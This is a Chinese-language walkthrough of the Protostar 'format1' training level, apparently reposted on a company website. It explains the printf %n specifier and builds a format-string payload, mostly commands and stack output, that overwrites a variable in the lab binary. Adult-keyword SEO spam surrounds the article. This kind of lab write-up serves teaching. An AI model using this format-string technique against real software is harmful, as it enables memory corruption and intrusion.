欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

Protostarformat1

About

This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
printf(string);

if(target) {
    printf("you have modified the target :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

這題一開始不會(huì)做,因?yàn)橹皩慍時(shí)比較少研究format的東東,因此也就沒接觸過%n這個(gè)東東。而簡(jiǎn)單簡(jiǎn)介下%n吧:
輸出格式 %n 可以將所輸出字符串的長(zhǎng)度值賦紿一個(gè)變量, 見下例:
    int slen;
    printf("hello world%n", &slen);
    執(zhí)行后變量slen被賦值為11。

再結(jié)合這道題的printf(string),其實(shí)這個(gè)跟printf("%s",string)是不一樣的,問題就是出自這里,當(dāng)格式化字符串后再加上%x的話會(huì)緊接著讀取堆棧里面的內(nèi)容。
首先要獲得target的地址:
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g         O .bss     00000004                            target

然后須在堆棧中找到執(zhí)行賦值動(dòng)作的位置,可用%x來填充堆棧的內(nèi)容:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*150+"%x"')
aaaaaaaa804960c.bffff628.8048469.b7fd8304.b7fd7ff4.bffff628.8048435.bffff7f1.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6a8.b7eadc76.2.bffff6d4.bffff6e0.b7fe1848.bffff690.ffffffff.b7ffeff4.804824d.1.bffff690.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6a8.1e6dfbd.2bb2c9ad.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6d4.8048450.8048440.b7ff1040.bffff6cc.b7fff8f8.2.bffff7e7.bffff7f1.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7cb.1f.bffffff2.f.bffff7db.0.0.0.19000000.5f0430f3.ed617f05.8671f725.69f2e525.363836.0.2e000000.726f662f.3174616d.61616100.61616161.2e782561.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e

目測(cè)大概在128個(gè)%x的位置,確認(rèn)一下:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*128+"%x"')
aaaaaaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fa7bb769.d02f2179.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.c000000.ab329b49.980b02cb.973cca28.695fb6c8.363836.0.0.662f2e00.616d726f.61003174.61616161

我們把前4字節(jié)換成target的地址:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print " \x38\x96\x04\x08aaaa" + "%x."*128+"%x"')
8aaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.6a958dd0.40c11bc0.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.86000000.b6399ac7.1f57cabc.3bd68bc6.69c7f777.363836.0.0.662f2e00.616d726f.38003174.61080496
發(fā)現(xiàn)有一個(gè)字節(jié)的錯(cuò)位,須調(diào)整一下:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%x"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fae225a2.d0b6b3b2.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.40000000.628ccb6c.1f6e8287.90ab45aa.6922104d.363836.0.0.662f2e00.616d726f.61003174.8049638

好了,定位成功了把最后的%x換成%x即可:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%n"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.2f09ffa.28a409ea.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.89000000.3f3cec1e.c342fe8e.7223fa6a.699b71e8.363836.0.0.662f2e00.616d726f.61003174.you have modified the target :)



標(biāo)題名稱:Protostarformat1
轉(zhuǎn)載來于:http://aaarwkj.com/article6/pegjig.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、電子商務(wù)、App設(shè)計(jì)、網(wǎng)站設(shè)計(jì)、網(wǎng)站導(dǎo)航、網(wǎng)站內(nèi)鏈

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

營(yíng)銷型網(wǎng)站建設(shè)
午夜未满十八禁止观看| 福利福利视频一区二区| 久久国产精品99亚洲| 国产精品白嫩初高中害羞小美女| 人妻中文字幕一区二区三| 人妻勾引中文字幕在线视频| 国产中文字幕精品在线观看| 日韩av高清在线播放| 国产原创av剧情在线播放| 精品国产自在久久成人| 国产精品乱码一区二区视频| 日本黄色中文字幕网站| 97精品免费在线观看| 亚州欧美精品一区二区| 亚洲欧洲国产视频一区二区| 婷婷激情六月中文字幕| 97资源在线公开视频| 国产av高清亚洲精品高清二部| 国产毛片久久久久久国产| 日日爱欧美精品亚洲成| 91精品国产综合久蜜臂| 国产精品推荐不卡一区| 亚洲丰满一区二区三区在线| 国产成人精品一二三四区| 国产精品国产亚洲av| 亚洲精品综合在线二区| 欧美午夜国产在线观看| 亚洲国产精品中文字幕一区久久 | 欧美日本精品在线观看| 欧美亚洲另类激情另类的| 一区二区亚洲成人精品| 少妇一夜一次一区二区| 亚洲福利网址一二三区| 国产成人免费视频一区| 濑亚美莉在线观看一区二区三区| 日本亚洲一区二区在线| 国产亚洲精品第一最新| 国产av一区二区三区中文| 国产午夜三级视频在线观看| 亚洲综合另类视频在线观看| 成年人片免费在线观看|